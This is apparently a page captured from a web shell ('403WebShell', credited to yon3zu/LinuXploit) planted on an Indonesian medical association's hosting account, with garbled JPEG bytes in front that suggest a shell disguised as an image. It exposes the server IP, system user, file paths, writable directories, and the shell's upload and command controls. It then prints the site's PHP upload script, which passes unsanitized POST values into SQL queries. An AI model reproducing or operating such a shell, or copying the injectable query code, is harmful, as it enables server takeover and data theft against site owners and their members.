JFIF ( %!1"%)-...383.7(-.+  -%&--------------------------------------------------"J !1"AQaq2BR#r3Sbs4T$Dd(!1"2AQaq# ?q& JX"-` Es?Bl 1( H6fX[vʆEiB!j{hu85o%TI/*T `WTXط8%ɀt*$PaSIa9gkG$t h&)ٞ)O.4uCm!w*:K*I&bDl"+ ӹ=<Ӷ|FtI{7_/,/T ̫ԷC ȷMq9[1w!R{ U<?СCԀdc8'124,I'3-G s4IcWq$Ro瓩!"j']VӤ'B4H8n)iv$Hb=B:B=YݚXZILcA g$ΕzuPD? !զIEÁ $D'l"gp`+6֏$1Ľ˫EjUpܣvDت\2Wڰ_iIْ/~'cŧE:ɝBn9&rt,H`*Tf֙LK$#d "p/n$J oJ@'I0B+NRwj2GH.BWLOiGP W@#"@ę| 2@P D2[Vj!VE11pHn,c~T;U"H㤑EBxHClTZ7:х5,w=.`,:Lt1tE9""@pȠb\I_IƝpe &܏/ 3, WE2aDK &cy(3nI7'0W էΠ\&@:נ!oZIܻ1j@=So LJ{5UĜiʒP H{^iaH?U2j@<'13nXkdP&%ɰ&-(<]Vlya7 6c1HJcmǸ!˗GB3Ԏߏ\=qIPNĉA)JeJtEJbIxWbdóT V'0 WH*|D u6ӈHZh[8e  $v>p!rIWeB,i '佧 )g#[)m!tahm_<6nL/ BcT{"HSfp7|ybi8'.ih%,wm  403WebShell
403Webshell
Server IP : 153.92.12.84  /  Your IP : 216.73.217.80
Web Server : LiteSpeed
System : Linux id-dci-web1986.main-hosting.eu 5.14.0-611.26.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Jan 29 05:24:47 EST 2026 x86_64
User : u686484674 ( 686484674)
PHP Version : 8.0.30
Disable Function : system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/u686484674/domains/idikotabandung.com/public_html/IDI/anggota/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/u686484674/domains/idikotabandung.com/public_html/IDI/anggota/bukti_rekadm.php
<?php

require_once 'koneksi.php';



		 $npm  = $_POST['npm'];

		// $nmlead = $_POST['nmlead'];

		 $noreg  = $_POST['noreg'];

         $nmsurat = $_POST['nm_surat'];

        // $chek = $_POST['chek'];



        $perihal	=$_POST['perihal']; 

?>



<?php

if(isset($_POST['submit'])){

 $direktori = 'files/'; //Folder penyimpanan file

 $max_size  = 1000000*3; //Ukuran file maximal 3 mb

 $nama_file = $_FILES['file']['name']; //Nama file yang akan di Upload

 $file_size = $_FILES['file']['size']; //Ukuran file yang akan di Upload

 $nama_tmp  = $_FILES['file']['tmp_name']; //Nama file sementara

 $upload = $direktori.$nama_file; //Memposisikan direktori penyimpanan dan file



	$temp = explode(".", $upload);//cari 

			$fotobaru = $direktori.$noreg.round(microtime(true)) . '.' . end($temp);//fungsi untuk membuat nama acak

	      

	$fotobaru2 = $noreg.round(microtime(true)) . '.' . end($temp);//fungsi untuk membuat nama acak

	//Proses akan dimulai apabila File telah dipilih sebelumnya

if($nama_file == ""){

	

	echo "<script>alert('File Gagal di Upload karena anda tidak memilih file apapun');window.history.go(-1);</script>";



}

else{

//Proses upload file jika ukuran lebih kecil dari yang di tentukan

if($file_size <= $max_size)

 {

		 

	//	$namanya= $noreg.$fileName; 

            $fileType = pathinfo($fotobaru, PATHINFO_EXTENSION); 

	 // hanya membolehkan format file tertentu 

            $allowTypes = array('jpg','png','jpeg','JPG','PNG','JPEG'); 

            if(in_array($fileType, $allowTypes)){ 

	

	       (move_uploaded_file($nama_tmp, $fotobaru));



		



			//	mysqli_query($konek, "INSERT INTO file (name,file,npm,noreg,nmfile,status,nmsurat) values('$nama_file', '$fotobaru', '$npm', '$noreg','$nama_file','proses','$nmsurat')");		

				

						$update = mysqli_query($konek, "UPDATE b_inv3 SET gambar='$fotobaru2' WHERE noreg='$noreg'");
                                                $update2 = mysqli_query($konek, "UPDATE h_registrasi SET adm='bayar' WHERE  noreg='$noreg'");
									

													

		//mysqli_query($konek, "INSERT INTO b_inv3 (npm,noreg,tgl_bayar,status,bayar,gambar,nominal,nmlead,noinv,level,perihal,kode)

//		values('$npm','$noreg','$tbayar','bayar','$bayar','$fotobaru2','$jumlah','$nmlead','$nextNoBayar','$level','$tujuan','3')");



				

					

				if($perihal=='p2kb'){

										                

                 header("location:statusp2kb.php?npm=$npm&noreg=$noreg");					   



									}else{	

						

				 header("location:status.php?npm=$npm&noreg=$noreg");					   



										 

									}

			

				

				

				

				

		  }else{

			 // echo "File ".$nama_file." Gagal diupload, format !";

	      echo "<script>alert('File Format : jpg, jpeg atau png');window.history.go(-1);</script>";

			}

			 }

			else

			{

 

	      echo "<script>alert('Gagal upload MAX File : 3 MB.');window.history.go(-1);</script>";

	

			}}}

			else

			{

          echo "Harus melalui Form Upload sebelum ke halaman ini!";

	      echo "<script>alert('Gagal');window.history.go(-1);</script>";

}

?>  

Youez - 2016 - github.com/yon3zu
LinuXploit